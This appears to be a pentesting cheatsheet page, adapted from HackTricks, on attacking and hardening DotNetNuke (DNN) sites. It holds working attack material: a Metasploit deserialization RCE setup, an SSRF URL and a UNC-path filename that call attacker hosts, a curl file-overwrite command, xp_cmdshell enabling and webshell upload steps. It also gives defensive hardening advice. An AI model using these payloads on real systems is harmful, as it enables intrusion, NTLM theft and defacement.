daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

dotnetnuke-dnn.md (9840B)


      1 ---
      2 title: "DotNetNuke (DNN)"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # DotNetNuke (DNN)
     14 
     15 ## DotNetNuke (DNN)
     16 
     17 If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.
     18 
     19 ---
     20 ## Version & Environment Enumeration
     21 
     22 * Check the *X-DNN* HTTP response header – it usually discloses the exact platform version.
     23 * `GET /Documentation/License.txt` is still useful for rough version fingerprinting on many deployments.
     24 * The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
     25 * `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
     26 * Probe `Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/` early: the default CKEditor provider is the attack surface behind the 2025 anonymous upload and NTLM-leak bugs.
     27 * Typical cookies you will see on a live instance:
     28   * `.DOTNETNUKE` – ASP.NET forms authentication ticket.
     29   * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below).
     30 
     31 ---
     32 ## Unauthenticated Exploitation
     33 
     34 ### 1. Cookie Deserialization RCE  (CVE-2017-9822 & follow-ups)
     35 *Affected versions ≤ 9.3.0-RC*
     36 
     37 `DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution. For gadget details and payload structure, check [this other page about .NET deserialization gadgets](/hacktricks/pentesting-web/deserialization/basic-net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json-net).<sup>[[1]](#references)</sup>
     38 
     39 ```text
     40 msf> use exploit/windows/http/dnn_cookie_deserialization_rce
     41 msf> set RHOSTS <target>
     42 msf> set LHOST  <attacker_ip>
     43 msf> run
     44 ```
     45 
     46 The module automatically chooses the right path for patched but still vulnerable versions (`CVE-2018-15811`, `CVE-2018-15812`, `CVE-2018-18325`, `CVE-2018-18326`). Useful operator notes:<sup>[[1]](#references)</sup>
     47 
     48 * A reliable trigger is any path that reaches the built-in DNN 404 page; the Metasploit module defaults to `/__`.
     49 * In `9.1.1`–`9.2.1`, **Verified Registration** leaks enough known plaintext (`{portalId}-{userId}` from the registration flow) to recover the weak DES-protected cookie material and re-exploit the bug.
     50 * In `9.2.0+`, exploitation also needs a valid `.DOTNETNUKE` session cookie.
     51 * In `9.2.2`–`9.3.0-RC`, `userId` became a GUID, so collecting several verification codes makes the offline key search practical again.
     52 * If self-registration is enabled, these "low-priv only" versions are still realistic Internet-facing targets.
     53 
     54 ### 2. Server-Side Request Forgery  (CVE-2025-32372)
     55 *Affected versions < 9.13.8  –  Patch released April 2025*
     56 
     57 A bypass of the older `DnnImageHandler` / remote-content validation logic enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF).<sup>[[3]](#references)</sup> Practical impacts:
     58 
     59 * Internal port scan / metadata service discovery in cloud deployments.
     60 * Reach hosts otherwise firewalled from the Internet.
     61 * Revisit older SSRF bug classes (`CVE-2017-0929`, `CVE-2021-40186`) during patch diffing, because the same image-fetching feature has been fixed multiple times.
     62 
     63 The 2025 bypass was caused by **prefix-based alias validation** (`portal.example.com` incorrectly matching `portal.example.com.attacker.tld`) instead of exact host/path matching.
     64 
     65 Proof-of-concept (replace `TARGET`, `VALID-ALIAS`, and `ATTACKER`):
     66 ```text
     67 https://TARGET/API/RemoteContentProxy?url=http://VALID-ALIAS.ATTACKER/poc
     68 ```
     69 The request is triggered in the background; use Burp Collaborator / Interactsh or a simple HTTP listener and watch for callbacks rather than expecting a full response body.
     70 
     71 ### 3. Anonymous CKE Upload / Content Overwrite  (CVE-2025-64095)
     72 *Affected versions < 10.1.1*
     73 
     74 The default HTML editor provider exposes `Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx` to anonymous users. By sending `overrideFiles=1`, an attacker can replace existing portal assets without logging in.<sup>[[4]](#references)</sup>
     75 
     76 ```bash
     77 curl -sk -X POST \
     78   'https://TARGET/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx' \
     79   -F 'file=@logo.svg;type=image/svg+xml' \
     80   -F 'storageFolderID=1' \
     81   -F 'portalID=0' \
     82   -F 'overrideFiles=1' \
     83   -F 'mode=Default'
     84 ```
     85 
     86 In the default configuration this is usually an **overwrite/defacement/stored-XSS** primitive rather than instant ASPX RCE: uploads commonly land in `Portals/_default/`, and public PoCs note that the default editor path typically accepts images / SVGs instead of arbitrary server-executable extensions.
     87 
     88 ### 4. NTLM Hash Exposure via Unicode-normalized UNC filename  (CVE-2025-52488)
     89 *Affected versions 6.0.0 – 9.x (< 10.0.1)*
     90 
     91 The same CKE upload surface can be abused with a filename that passes initial validation but **normalizes into a UNC path** later in the workflow.<sup>[[5]](#references)</sup> Public writeups highlight fullwidth Unicode characters such as `U+FF3C` and `U+FF0E`, which become backslashes and dots late enough to re-introduce a path like `\\attacker\share.jpg`.
     92 
     93 ```text
     94 filename="%EF%BC%BC%EF%BC%BCattacker%EF%BC%8Ecom%EF%BC%BCshare.jpg"
     95 # => \\attacker.com\share.jpg after normalization
     96 ```
     97 
     98 That forces the Windows host to attempt outbound SMB authentication and leak NTLM material. Run **Responder** / **ntlmrelayx** and look for SMB callbacks instead of HTTP ones.
     99 
    100 ### 5. IP Filter Bypass  (CVE-2025-52487)
    101 If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed in reverse-proxy setups by manipulating forwarding headers such as `X-Forwarded-For`.<sup>[[6]](#references)</sup> Test the protected login flow through the same proxy path normal users hit, not only by talking directly to the origin.
    102 
    103 ---
    104 ## Post-Authentication to RCE
    105 
    106 ### Via SQL console
    107 Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:
    108 
    109 ```sql
    110 EXEC sp_configure 'show advanced options', 1;
    111 RECONFIGURE;
    112 EXEC sp_configure 'xp_cmdshell', 1;
    113 RECONFIGURE;
    114 GO
    115 xp_cmdshell 'whoami';
    116 ```
    117 
    118 ### Via ASPX webshell upload
    119 1. Go to **`Settings → Security → More → More Security Settings`**.
    120 2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
    121 3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
    122 4. Trigger it at **`/Portals/0/shell.aspx`**.
    123 
    124 Before **9.13.2**, DNN mostly validated uploads by **extension** and not by actual file contents. That means renamed PE files (for example a file beginning with `MZ` but named `payload.jpg`) could still be staged in the portal file store. By itself this is not IIS RCE, but it is a useful primitive for later overwrite / execution chains.
    125 
    126 ---
    127 ## Privilege Escalation on Windows
    128 Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:
    129 
    130 * **PrintSpoofer** / **RoguePotato** / **GodPotato** when `SeImpersonatePrivilege` is present.
    131 * Token/service-account escape primitives such as **SharpEfsPotato** depending on OS build and patch level.
    132 
    133 ---
    134 ## Hardening Recommendations (Blue Team)
    135 
    136 * **Upgrade** to at least **10.1.1**. Staying on **9.13.8/9.13.9** only closes the older SSRF class and still leaves later HTML-editor attack surface unaddressed.<sup>[[2]](#references)</sup>
    137 * If you must stay on 9.x, prefer the latest **9.13.x** build and put the CKE browser/upload endpoints behind upstream access controls.
    138 * Remove residual **`InstallWizard.aspx*`** files after installation.
    139 * Disable outbound SMB (ports **445/139**) egress.
    140 * Do not rely on DNN's login IP filters unless the edge proxy overwrites forwarding headers.
    141 * Block access to `/API/RemoteContentProxy` if unused.
    142 * Consider denying direct Internet access to `/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/` when the editor is not needed externally.
    143 
    144 ## References
    145 
    146 - [1] [Rapid7 Metasploit module docs: `dnn_cookie_deserialization_rce`](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md)
    147 - [2] [DNN Platform `v10.1.1` release notes](https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v10.1.1)
    148 - [3] [DNN Security Advisory GHSA-3f7v-qx94-666m – Server-Side Request Forgery (SSRF) in DotNetNuke.Core (CVE-2025-32372)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3f7v-qx94-666m)
    149 - [4] [DNN Security Advisory GHSA-3m8r-w7xg-jqvw – Insufficient Access Control: Image Upload allows Site Content Overwrite (CVE-2025-64095)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-3m8r-w7xg-jqvw)
    150 - [5] [DNN Security Advisory GHSA-mgfv-2362-jq96 – NTLM hash leakage via SMB share interaction with malicious user input (CVE-2025-52488)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96)
    151 - [6] [DNN Security Advisory GHSA-fjhg-3mrh-mm7h – Possible bypass of IP Filters (CVE-2025-52487)](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-fjhg-3mrh-mm7h)